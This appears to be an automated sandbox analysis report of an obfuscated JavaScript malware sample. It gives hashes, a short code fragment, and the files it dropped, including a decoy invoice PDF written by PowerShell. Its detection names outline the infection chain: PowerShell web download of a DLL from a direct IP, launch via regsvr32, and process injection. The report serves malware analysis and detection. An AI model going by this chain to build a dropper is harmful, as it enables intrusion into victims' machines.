12071652839003777.js
|
ASCII text, with very long lines (15969), with CRLF line terminators
|
initial sample
|
|
|
|
Filetype: |
ASCII text, with very long lines (15969), with CRLF line terminators
|
Entropy: |
4.899679662697007
|
Filename: |
12071652839003777.js
|
Filesize: |
19450
|
MD5: |
4ed0fdedb55f9e5234c2883fa8187f25
|
SHA1: |
a8264a489caf90a188a60404330a39547339e670
|
SHA256: |
98a4271053b20914e44beb872b7f44a4a4371f80fcfd05b00552e838704ac3e5
|
SHA512: |
f3cd23a948d214084bc87f49bdd48dd8cea44d2768d8070e105e4e23acf9a935db271d36ecc2b84771ee976d6c4feca09400761b5ed9e923204a5da20d854c3f
|
SSDEEP: |
384:1DghNQ9Url0CPSo/6dDt5sluZbO3/m3TMcZVgTnz4MKraVeZQ36l3AMa:VqNQ9UBhKo2DJZQ361AMa
|
Preview: |
function ahogkcmwc(){xgyvqios=[1031,3079,5127,4103,2055,3072];var lgprgir=this[oqlyoud+pwplig+xzucopd+hxctjypl+cteyx+sxkktpopk+sxaspobp+dlzlkap](this[tusbbyqnk+vgfitbr+bmoborbtw+xzucopd+soqaakpn+oqlyoud+dlzlkap][doinddx+xzucopd+cteyx+pwplig+dlzlkap+cteyx+
|
Signature Hits |
Behavior Group |
Mitre Attack |
|
JavaScript source code contains functionality to generate code involving a shell, file or stream |
Software Vulnerabilities |
|
Java / VBScript file with very long strings (likely obfuscated code) |
System Summary |
Obfuscated Files or Information
|
|
C:\Users\user\AppData\Local\Temp\invoice.pdf
|
PDF document, version 1.7
|
dropped
|
|
|
|
File: |
C:\Users\user\AppData\Local\Temp\invoice.pdf
|
Category: |
dropped
|
Dump: |
invoice.pdf.4.dr
|
ID: |
dr_2
|
Target ID: |
4
|
Process: |
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
Type: |
PDF document, version 1.7
|
Entropy: |
7.929592005409041
|
Encrypted: |
false
|
Ssdeep: |
12288:+ZLfaHa9wphzjERQ/JTckor+EURE+AwAX75pfGJKsKca+e7lEjYQ:+ZyjgQRRor+lRJAwAXlpoKgQ76jYQ
|
Size: |
635764
|
Whitelisted: |
false
|
Reputation: |
timeout
|
Signature Hits |
Behavior Group |
Mitre Attack |
|
Sigma detected: Powershell launch regsvr32 |
HIPS / PFW / Operating System Protection Evasion |
|
Gathers information about network shares |
Stealing of Sensitive Information |
|
Sigma detected: Suspicious Invoke-WebRequest Execution |
System Summary |
|
Sigma detected: Suspicious Script Execution From Temp Folder |
System Summary |
|
Suspicious powershell command line found |
Data Obfuscation |
|
Wscript starts Powershell (via cmd or directly) |
System Summary |
|
Creates a process in suspended mode (likely to inject code) |
HIPS / PFW / Operating System Protection Evasion |
|
Sigma detected: Cscript/Wscript Potentially Suspicious Child Process |
System Summary |
|
Sigma detected: Potential DLL File Download Via PowerShell Invoke-WebRequest |
System Summary |
|
Sigma detected: PowerShell Script Run in AppData |
System Summary |
|
Sigma detected: PowerShell Web Download |
System Summary |
|
Sigma detected: Suspicious Invoke-WebRequest Execution With DirectIP |
System Summary |
|
Sigma detected: Usage Of Web Request Commands And Cmdlets |
System Summary |
|
Sigma detected: Non Interactive PowerShell Process Spawned |
System Summary |
|
Spawns processes |
System Summary |
|
|
C:\ProgramData\Microsoft\Network\Downloader\edb.log
|
data
|
dropped
|
|
|
|
File: |
C:\ProgramData\Microsoft\Network\Downloader\edb.log
|
Category: |
dropped
|
Dump: |
edb.log.9.dr
|
ID: |
dr_51
|
Target ID: |
9
|
Process: |
C:\Windows\System32\svchost.exe
|
Type: |
data
|
Entropy: |
0.8021893244871938
|
Encrypted: |
false
|
Ssdeep: |
1536:RJszRK0I9i0k0I9wXq0I9UGJC/PQJCmJCovVsnQ9Sii1GY9zOoRXTpMNYpKhvUAA:RJE+Lfki1GjHwU/+vVhWqpx
|
Size: |
1310720
|
Whitelisted: |
false
|
Reputation: |
timeout
|
Signature Hits |
Behavior Group |
Mitre Attack |
|
Queries the volume information (name, serial number etc) of a device |
Language, Device and Operating System Detection |
System Information Discovery
|
|
C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
|
Extensible storage engine DataBase, version 0x620, checksum 0xf5919c3c, page size 16384, DirtyShutdown, Windows version 10.0
|
dropped
|
|
|
|
File: |
C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
|
Category: |
dropped
|
Dump: |
qmgr.db.9.dr
|
ID: |
dr_49
|
Target ID: |
9
|
Process: |
C:\Windows\System32\svchost.exe
|
Type: |
Extensible storage engine DataBase, version 0x620, checksum 0xf5919c3c, page size 16384, DirtyShutdown, Windows version 10.0
|
Entropy: |
0.943339834598836
|
Encrypted: |
false
|
Ssdeep: |
1536:DSB2ESB2SSjlK/ZvxPXK0I9XGJCTgzZYkr3g16zV2UPkLk+kY+lKuy9ny5zPOZ15:DazaHvxXy2V2UR
|
Size: |
1048576
|
Whitelisted: |
false
|
Reputation: |
timeout
|
Signature Hits |
Behavior Group |
Mitre Attack |
|
Queries the volume information (name, serial number etc) of a device |
Language, Device and Operating System Detection |
System Information Discovery
|
|
C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
|
data
|
dropped
|
|
|
|
File: |
C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
|
Category: |
dropped
|
Dump: |
qmgr.jfm.9.dr
|
ID: |
dr_50
|
Target ID: |
9
|
Process: |
C:\Windows\System32\svchost.exe
|
Type: |
data
|
Entropy: |
0.08137462201530167
|
Encrypted: |
false
|
Ssdeep: |
3:mlXKYeVZkYll/nqlFcl1ZUllllgZZkYkllallGBnX/l/Tj/k7/t:mlXKzVxl/qlFclQ/l4aJlA254
|
Size: |
16384
|
Whitelisted: |
false
|
Reputation: |
timeout
|
Signature Hits |
Behavior Group |
Mitre Attack |
|
Queries the volume information (name, serial number etc) of a device |
Language, Device and Operating System Detection |
System Information Discovery
|
|
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG
|
ASCII text
|
dropped
|
|
|
|
File: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG
|
Category: |
dropped
|
Dump: |
LOG1.8.dr
|
ID: |
dr_43
|
Target ID: |
8
|
Process: |
C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
|
Type: |
ASCII text
|
Entropy: |
5.119264736293105
|
Encrypted: |
false
|
Ssdeep: |
6:iOZUh+q2PCHhJ2nKuAl9OmbnIFUtRZXWZmw/ZiVkwOCHhJ2nKuAl9OmbjLJ:7qh+vBHAahFUtRpW//UV56HAaSJ
|
Size: |
294
|
Whitelisted: |
false
|
Reputation: |
timeout
|
|
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old (copy)
|
ASCII text
|
dropped
|
|
|
|
File: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old (copy)
|
Category: |
dropped
|
Dump: |
LOG1.8.dr
|
ID: |
dr_46
|
Target ID: |
8
|
Process: |
C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
|
Type: |
ASCII text
|
Entropy: |
5.119264736293105
|
Encrypted: |
false
|
Ssdeep: |
6:iOZUh+q2PCHhJ2nKuAl9OmbnIFUtRZXWZmw/ZiVkwOCHhJ2nKuAl9OmbjLJ:7qh+vBHAahFUtRpW//UV56HAaSJ
|
Size: |
294
|
Whitelisted: |
false
|
Reputation: |
timeout
|
|
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG
|
ASCII text
|
dropped
|
|
|
|
File: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG
|
Category: |
dropped
|
Dump: |
LOG0.8.dr
|
ID: |
dr_42
|
Target ID: |
8
|
Process: |
C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
|
Type: |
ASCII text
|
Entropy: |
5.137355499898155
|
Encrypted: |
false
|
Ssdeep: |
6:iORqN+q2PCHhJ2nKuAl9Ombzo2jMGIFUtLrZmwtJVkwOCHhJ2nKuAl9Ombzo2jM4:7RqN+vBHAa8uFUtLr/tJV56HAa8RJ
|
Size: |
338
|
Whitelisted: |
false
|
Reputation: |
timeout
|
|
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old (copy)
|
ASCII text
|
dropped
|
|
|
|
File: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old (copy)
|
Category: |
dropped
|
Dump: |
LOG0.8.dr
|
ID: |
dr_47
|
Target ID: |
8
|
Process: |
C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
|
Type: |
ASCII text
|
Entropy: |
5.137355499898155
|
Encrypted: |
false
|
Ssdeep: |
6:iORqN+q2PCHhJ2nKuAl9Ombzo2jMGIFUtLrZmwtJVkwOCHhJ2nKuAl9Ombzo2jM4:7RqN+vBHAa8uFUtLr/tJV56HAa8RJ
|
Size: |
338
|
Whitelisted: |
false
|
Reputation: |
timeout
|
|
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State (copy)
|
JSON data
|
dropped
|
|
|
|
File: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State (copy)
|
Category: |
dropped
|
Dump: |
ba69b8e6-324f-4b5c-a065-16b27d069c13.tmp.10.dr
|
ID: |
dr_54
|
Target ID: |
10
|
Process: |
C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
|
Type: |
JSON data
|
Entropy: |
4.949441607411077
|
Encrypted: |
false
|
Ssdeep: |
12:YH/um3RA8sqg4hsBdOg2HVvcaq3QYiub6P7E4T3y:Y2sRdsIydMHVe3QYhbS7nby
|
Size: |
475
|
Whitelisted: |
false
|
Reputation: |
timeout
|
|
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\ba69b8e6-324f-4b5c-a065-16b27d069c13.tmp
|
JSON data
|
modified
|
|
|
|
File: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\ba69b8e6-324f-4b5c-a065-16b27d069c13.tmp
|
Category: |
modified
|
Dump: |
ba69b8e6-324f-4b5c-a065-16b27d069c13.tmp.10.dr
|
ID: |
dr_53
|
Target ID: |
10
|
Process: |
C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
|
Type: |
JSON data
|
Entropy: |
4.949441607411077
|
Encrypted: |
false
|
Ssdeep: |
12:YH/um3RA8sqg4hsBdOg2HVvcaq3QYiub6P7E4T3y:Y2sRdsIydMHVe3QYhbS7nby
|
Size: |
475
|
Whitelisted: |
false
|
Reputation: |
timeout
|
|
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log
|
data
|
dropped
|
|
|
|
File: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log
|
Category: |
dropped
|
Dump: |
000003.log.8.dr
|
ID: |
dr_39
|
Target ID: |
8
|
Process: |
C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
|
Type: |
data
|
Entropy: |
5.236055981011968
|
Encrypted: |
false
|
Ssdeep: |
96:S4bz5vsZ4CzSAsfTxiVud4TxY0CIOr3MCWO3VxBaw+bZ+ns2:S43C4mS7fFi0KFYDjr3LWO3V3aw+bZ+T
|
Size: |
3878
|
Whitelisted: |
false
|
Reputation: |
timeout
|
|
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG
|
ASCII text
|
dropped
|
|
|
|
File: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG
|
Category: |
dropped
|
Dump: |
LOG.8.dr
|
ID: |
dr_40
|
Target ID: |
8
|
Process: |
C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
|
Type: |
ASCII text
|
Entropy: |
5.116945566963374
|
Encrypted: |
false
|
Ssdeep: |
6:iOdu7N+q2PCHhJ2nKuAl9OmbzNMxIFUtdTSGXZmw7jSNVkwOCHhJ2nKuAl9OmbzE:707N+vBHAa8jFUt/X/7uNV56HAa84J
|
Size: |
326
|
Whitelisted: |
false
|
Reputation: |
timeout
|
|
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old (copy)
|
ASCII text
|
dropped
|
|
|
|
File: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old (copy)
|
Category: |
dropped
|
Dump: |
LOG.8.dr
|
ID: |
dr_48
|
Target ID: |
8
|
Process: |
C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
|
Type: |
ASCII text
|
Entropy: |
5.116945566963374
|
Encrypted: |
false
|
Ssdeep: |
6:iOdu7N+q2PCHhJ2nKuAl9OmbzNMxIFUtdTSGXZmw7jSNVkwOCHhJ2nKuAl9OmbzE:707N+vBHAa8jFUt/X/7uNV56HAa84J
|
Size: |
326
|
Whitelisted: |
false
|
Reputation: |
timeout
|
|
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3D
|
Certificate, Version=3
|
dropped
|
|
|
|
File: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3D
|
Category: |
dropped
|
Dump: |
2D85F72862B55C4EADD9E66E06947F3D.8.dr
|
ID: |
dr_34
|
Target ID: |
8
|
Process: |
C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
|
Type: |
Certificate, Version=3
|
Entropy: |
7.705940075877404
|
Encrypted: |
false
|
Ssdeep: |
24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1
|
Size: |
1391
|
Whitelisted: |
true
|
Reputation: |
timeout
|
|
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
|
Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks,
0x1 compression
|
dropped
|
|
|
|
File: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
|
Category: |
dropped
|
Dump: |
77EC63BDA74BD0D0E0426DC8F8008506.8.dr
|
ID: |
dr_44
|
Target ID: |
8
|
Process: |
C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
|
Type: |
Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks,
0x1 compression
|
Entropy: |
7.996617769952133
|
Encrypted: |
true
|
Ssdeep: |
1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
|
Size: |
71954
|
Whitelisted: |
false
|
Reputation: |
timeout
|
|
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2D85F72862B55C4EADD9E66E06947F3D
|
data
|
dropped
|
|
|
|
File: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2D85F72862B55C4EADD9E66E06947F3D
|
Category: |
dropped
|
Dump: |
2D85F72862B55C4EADD9E66E06947F3D0.8.dr
|
ID: |
dr_35
|
Target ID: |
8
|
Process: |
C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
|
Type: |
data
|
Entropy: |
2.7425532007658724
|
Encrypted: |
false
|
Ssdeep: |
3:kkFkl6VDtfllXlE/HT8kymhttNNX8RolJuRdxLlGB9lQRYwpDdt:kKjFeT8y3NMa8RdWBwRd
|
Size: |
192
|
Whitelisted: |
false
|
Reputation: |
timeout
|
|
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
|
data
|
dropped
|
|
|
|
File: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
|
Category: |
dropped
|
Dump: |
77EC63BDA74BD0D0E0426DC8F80085060.8.dr
|
ID: |
dr_45
|
Target ID: |
8
|
Process: |
C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
|
Type: |
data
|
Entropy: |
3.139179158420051
|
Encrypted: |
false
|
Ssdeep: |
6:kKlanM/L9UswDLL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:msiDnLNkPlE99SNxAhUe/3
|
Size: |
328
|
Whitelisted: |
false
|
Reputation: |
timeout
|
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeCMapFnt23.lst (copy)
|
PostScript document text
|
dropped
|
|
|
|
File: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeCMapFnt23.lst (copy)
|
Category: |
dropped
|
Dump: |
AdobeFnt23.lst.52720.5.dr
|
ID: |
dr_33
|
Target ID: |
5
|
Process: |
C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
|
Type: |
PostScript document text
|
Entropy: |
5.233980037532449
|
Encrypted: |
false
|
Ssdeep: |
24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
|
Size: |
1233
|
Whitelisted: |
false
|
Reputation: |
timeout
|
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeFnt23.lst.5272
|
PostScript document text
|
dropped
|
|
|
|
File: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeFnt23.lst.5272
|
Category: |
dropped
|
Dump: |
AdobeFnt23.lst.52720.5.dr
|
ID: |
dr_22
|
Target ID: |
5
|
Process: |
C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
|
Type: |
PostScript document text
|
Entropy: |
5.233980037532449
|
Encrypted: |
false
|
Ssdeep: |
24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
|
Size: |
1233
|
Whitelisted: |
false
|
Reputation: |
timeout
|
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeSysFnt23.lst (copy)
|
PostScript document text
|
dropped
|
|
|
|
File: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeSysFnt23.lst (copy)
|
Category: |
dropped
|
Dump: |
AdobeFnt23.lst.52720.5.dr
|
ID: |
dr_32
|
Target ID: |
5
|
Process: |
C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
|
Type: |
PostScript document text
|
Entropy: |
5.233980037532449
|
Encrypted: |
false
|
Ssdeep: |
24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
|
Size: |
1233
|
Whitelisted: |
false
|
Reputation: |
timeout
|
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\AcroFnt23.lst (copy)
|
PostScript document text
|
dropped
|
|
|
|
File: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\AcroFnt23.lst (copy)
|
Category: |
dropped
|
Dump: |
AdobeFnt23.lst.5272.5.dr
|
ID: |
dr_31
|
Target ID: |
5
|
Process: |
C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
|
Type: |
PostScript document text
|
Entropy: |
5.214360287289079
|
Encrypted: |
false
|
Ssdeep: |
192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp
|
Size: |
10880
|
Whitelisted: |
false
|
Reputation: |
timeout
|
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\AdobeFnt23.lst.5272
|
PostScript document text
|
dropped
|
|
|
|
File: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\AdobeFnt23.lst.5272
|
Category: |
dropped
|
Dump: |
AdobeFnt23.lst.5272.5.dr
|
ID: |
dr_21
|
Target ID: |
5
|
Process: |
C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
|
Type: |
PostScript document text
|
Entropy: |
5.214360287289079
|
Encrypted: |
false
|
Ssdeep: |
192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp
|
Size: |
10880
|
Whitelisted: |
false
|
Reputation: |
timeout
|
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\ACROBAT_READER_MASTER_SURFACEID
|
JSON data
|
dropped
|
|
|
|
File: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\ACROBAT_READER_MASTER_SURFACEID
|
Category: |
dropped
|
Dump: |
ACROBAT_READER_MASTER_SURFACEID.5.dr
|
ID: |
dr_30
|
Target ID: |
5
|
Process: |
C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
|
Type: |
JSON data
|
Entropy: |
5.35423473953786
|
Encrypted: |
false
|
Ssdeep: |
6:YEQXJ2HXaVWP8z14vB3/dVlPIHAR0YCqoAvJM3g98kUwPeUkwRe9:YvXKXavzKvR/ZwHAOZGMbLUkee9
|
Size: |
295
|
Whitelisted: |
false
|
Reputation: |
timeout
|
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Home_View_Surface
|
JSON data
|
dropped
|
|
|
|
File: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Home_View_Surface
|
Category: |
dropped
|
Dump: |
DC_FirstMile_Home_View_Surface.5.dr
|
ID: |
dr_11
|
Target ID: |
5
|
Process: |
C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
|
Type: |
JSON data
|
Entropy: |
5.292708838579496
|
Encrypted: |
false
|
Ssdeep: |
6:YEQXJ2HXaVWP8z14vB3/dVlPIHAR0YCqoAvJfBoTfXpnrPeUkwRe9:YvXKXavzKvR/ZwHAOZGWTfXcUkee9
|
Size: |
294
|
Whitelisted: |
false
|
Reputation: |
timeout
|
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Right_Sec_Surface
|
JSON data
|
dropped
|
|
|
|
File: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Right_Sec_Surface
|
Category: |
dropped
|
Dump: |
DC_FirstMile_Right_Sec_Surface.5.dr
|
ID: |
dr_8
|
Target ID: |
5
|
Process: |
C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
|
Type: |
JSON data
|
Entropy: |
5.271415052806375
|
Encrypted: |
false
|
Ssdeep: |
6:YEQXJ2HXaVWP8z14vB3/dVlPIHAR0YCqoAvJfBD2G6UpnrPeUkwRe9:YvXKXavzKvR/ZwHAOZGR22cUkee9
|
Size: |
294
|
Whitelisted: |
false
|
Reputation: |
timeout
|
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_READER_LAUNCH_CARD
|
JSON data
|
dropped
|
|
|
|
File: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_READER_LAUNCH_CARD
|
Category: |
dropped
|
Dump: |
DC_READER_LAUNCH_CARD.5.dr
|
ID: |
dr_4
|
Target ID: |
5
|
Process: |
C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
|
Type: |
JSON data
|
Entropy: |
5.330862982687389
|
Encrypted: |
false
|
Ssdeep: |
6:YEQXJ2HXaVWP8z14vB3/dVlPIHAR0YCqoAvJfPmwrPeUkwRe9:YvXKXavzKvR/ZwHAOZGH56Ukee9
|
Size: |
285
|
Whitelisted: |
false
|
Reputation: |
timeout
|
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Convert_LHP_Banner
|
JSON data
|
dropped
|
|
|
|
File: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Convert_LHP_Banner
|
Category: |
dropped
|
Dump: |
DC_Reader_Convert_LHP_Banner.5.dr
|
ID: |
dr_28
|
Target ID: |
5
|
Process: |
C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
|
Type: |
JSON data
|
Entropy: |
5.689773975708149
|
Encrypted: |
false
|
Ssdeep: |
24:Yv6XabKJhTpLgE9cQx8LennAvzBvkn0RCmK8czOCCS1:YvBKJhThgy6SAFv5Ah8cv/1
|
Size: |
1123
|
Whitelisted: |
false
|
Reputation: |
timeout
|
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Banner
|
JSON data
|
dropped
|
|
|
|
File: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Banner
|
Category: |
dropped
|
Dump: |
DC_Reader_Disc_LHP_Banner.5.dr
|
ID: |
dr_24
|
Target ID: |
5
|
Process: |
C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
|
Type: |
JSON data
|
Entropy: |
5.282184958973457
|
Encrypted: |
false
|
Ssdeep: |
6:YEQXJ2HXaVWP8z14vB3/dVlPIHAR0YCqoAvJf8dPeUkwRe9:YvXKXavzKvR/ZwHAOZGU8Ukee9
|
Size: |
289
|
Whitelisted: |
false
|
Reputation: |
timeout
|
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Retention
|
JSON data
|
dropped
|
|
|
|
File: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Retention
|
Category: |
dropped
|
Dump: |
DC_Reader_Disc_LHP_Retention.5.dr
|
ID: |
dr_26
|
Target ID: |
5
|
Process: |
C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
|
Type: |
JSON data
|
Entropy: |
5.2813377572537625
|
Encrypted: |
false
|
Ssdeep: |
6:YEQXJ2HXaVWP8z14vB3/dVlPIHAR0YCqoAvJfQ1rPeUkwRe9:YvXKXavzKvR/ZwHAOZGY16Ukee9
|
Size: |
292
|
Whitelisted: |
false
|
Reputation: |
timeout
|
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Edit_LHP_Banner
|
JSON data
|
dropped
|
|
|
|
File: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Edit_LHP_Banner
|
Category: |
dropped
|
Dump: |
DC_Reader_Edit_LHP_Banner.5.dr
|
ID: |
dr_13
|
Target ID: |
5
|
Process: |
C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
|
Type: |
JSON data
|
Entropy: |
5.298419009797501
|
Encrypted: |
false
|
Ssdeep: |
6:YEQXJ2HXaVWP8z14vB3/dVlPIHAR0YCqoAvJfFldPeUkwRe9:YvXKXavzKvR/ZwHAOZGz8Ukee9
|
Size: |
289
|
Whitelisted: |
false
|
Reputation: |
timeout
|
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Home_LHP_Trial_Banner
|
JSON data
|
dropped
|
|
|
|
File: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Home_LHP_Trial_Banner
|
Category: |
dropped
|
Dump: |
DC_Reader_Home_LHP_Trial_Banner.5.dr
|
ID: |
dr_27
|
Target ID: |
5
|
Process: |
C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
|
Type: |
JSON data
|
Entropy: |
5.310093092406178
|
Encrypted: |
false
|
Ssdeep: |
6:YEQXJ2HXaVWP8z14vB3/dVlPIHAR0YCqoAvJfzdPeUkwRe9:YvXKXavzKvR/ZwHAOZGb8Ukee9
|
Size: |
295
|
Whitelisted: |
false
|
Reputation: |
timeout
|
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_More_LHP_Banner
|
JSON data
|
dropped
|
|
|
|
File: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_More_LHP_Banner
|
Category: |
dropped
|
Dump: |
DC_Reader_More_LHP_Banner.5.dr
|
ID: |
dr_25
|
Target ID: |
5
|
Process: |
C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
|
Type: |
JSON data
|
Entropy: |
5.2908218449850075
|
Encrypted: |
false
|
Ssdeep: |
